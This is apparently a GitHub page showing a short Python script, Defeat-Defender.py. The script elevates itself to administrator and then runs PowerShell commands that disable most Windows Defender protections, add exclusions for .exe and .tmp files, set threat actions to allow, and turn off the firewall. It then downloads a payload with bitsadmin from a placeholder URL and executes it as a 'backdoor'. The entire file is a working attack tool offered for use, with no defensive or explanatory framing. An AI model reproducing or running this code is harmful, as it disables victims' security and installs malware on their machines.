-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathDefeat-Defender.py
58 lines (43 loc) · 2.77 KB
/
Defeat-Defender.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
from pathlib import Path
import platform
import tempfile
import subprocess
import time
import os
import sys
import win32com.shell.shell as shell
ASADMIN = 'asadmin'
if sys.argv[-1] != ASADMIN:
script = os.path.abspath(sys.argv[0])
params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
sys.exit(0)
subprocess.call("powershell.exe -command Add-MpPreference -ExclusionExtension .exe", shell=TRUE)
subprocess.call("powershell.exe -command Add-MpPreference -ExclusionExtension .tmp", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -EnableControlledFolderAccess Disabled", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -PUAProtection disable", shell=TRUE)
subprocess.call("powershell.exe -command Add-MpPreference -ExclusionExtension .exe", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -DisableBlockAtFirstSeen $true", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -DisableIOAVProtection $true", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -DisablePrivacyMode $true", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -DisableArchiveScanning $true", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -DisableIntrusionPreventionSystem $true", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -DisableScriptScanning $true", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -SubmitSamplesConsent 2", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -MAPSReporting 0", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -HighThreatDefaultAction 6 -Force", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -ModerateThreatDefaultAction 6", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -LowThreatDefaultAction 6", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -SevereThreatDefaultAction 6", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -ScanScheduleDay 8", shell=TRUE)
subprocess.call("powershell.exe -command netsh advfirewall set allprofiles state off", shell=TRUE)
time.sleep(25)
subprocess.call(
"bitsadmin /transfer mydownloadjob /download /priority FOREGROUND https://direct-url-of-payload/payload.exe %temp%\payload.exe", shell=TRUE) #change this url
tempdir = Path(tempfile.gettempdir())
os.chdir(tempdir)
def runbackdoor():
os.system("payload.exe") #change this
runbackdoor()
sys.exit()